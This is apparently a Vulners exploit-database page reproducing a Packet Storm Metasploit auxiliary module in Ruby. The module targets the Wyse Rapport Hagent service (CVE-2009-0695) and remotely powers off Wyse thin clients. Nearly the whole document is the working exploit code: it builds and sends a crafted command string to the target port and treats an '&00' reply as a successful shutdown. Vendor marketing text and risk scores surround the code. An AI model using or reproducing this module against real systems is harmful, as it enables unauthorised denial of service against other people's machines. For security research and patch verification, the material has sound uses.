Lucene search
K

Wyse Machine Remote Power Off Denial Of Service

🗓️ 14 Jun 2012 00:00:00Reported by it.soluniumType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 32 Views

Exploiting Wyse Rapport Hagent to remotely power off Wyse machine

Related
Code
`require 'msf/core'  
  
class Metasploit3 < Msf::Auxiliary  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Wyse Machine Remote Power off (DOS)',  
'Description' => %q{  
This module exploits the Wyse Rapport Hagent service and cause  
remote power cycle (Power off the wyse machine remotely).  
},  
'Stance' => Msf::Exploit::Stance::Aggressive,  
'Author' => '[email protected]',  
'Version' => '$Revision: 14976 $',  
'References' =>  
[  
['CVE', '2009-0695'],  
['OSVDB', '55839'],  
['US-CERT-VU', '654545'],  
['URL', 'http://snosoft.blogspot.com/'],  
['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],  
['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],  
['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],  
],  
'Privileged' => true,  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Targets' =>  
[  
[ 'Wyse Linux x86', {'Platform' => 'linux',}],  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Jun 13 2012'  
))  
  
register_options(  
[  
Opt::RPORT(80),  
], self.class)  
end  
  
  
def run  
  
  
# Connect to the target service  
print_status("Connecting to the target #{rhost}:#{rport}")  
if connect  
print_status("Connected...")  
end  
  
# Parameters  
  
genmac = "00"+Rex::Text.rand_text(5).unpack("H*")[0]  
  
craft_req = '&V52&CI=3|'  
craft_req << 'MAC=#{genmac}|#{rhost}|'  
craft_req << 'RB=0|MT=3|'  
craft_req << '|HS=#{rhost}|PO=#{rport}|'  
craft_req << 'SPO=0|'  
  
# Send the malicious request  
sock.put(craft_req)  
  
# Download some response data  
resp = sock.get_once(-1, 10)  
print_status("Received: #{resp}")  
  
disconnect  
  
if not resp  
print_error("No reply from the target, this may not be a vulnerable system")  
return  
end  
  
if resp == '&00'  
print_status("#{rhost} execute command succefuly & power off.")  
return  
end  
  
#Exeptions  
rescue ::Rex::ConnectionRefused  
print_status("Couldn't connect to #{rhost}:#{rport} | Connection refused.")  
rescue ::Rex::HostUnreachable  
print_status("Couldn't connect to #{rhost}:#{rport} | Host unreachable")  
rescue ::Rex::ConnectionTimeout  
print_status("Couldn't connect to #{rhost}:#{rport} | Connection time out")  
rescue ::Errno::ECONNRESET, ::Timeout::Error  
print_status("#{rhost} not responding.")  
  
end  
end  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jun 2012 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.64232
32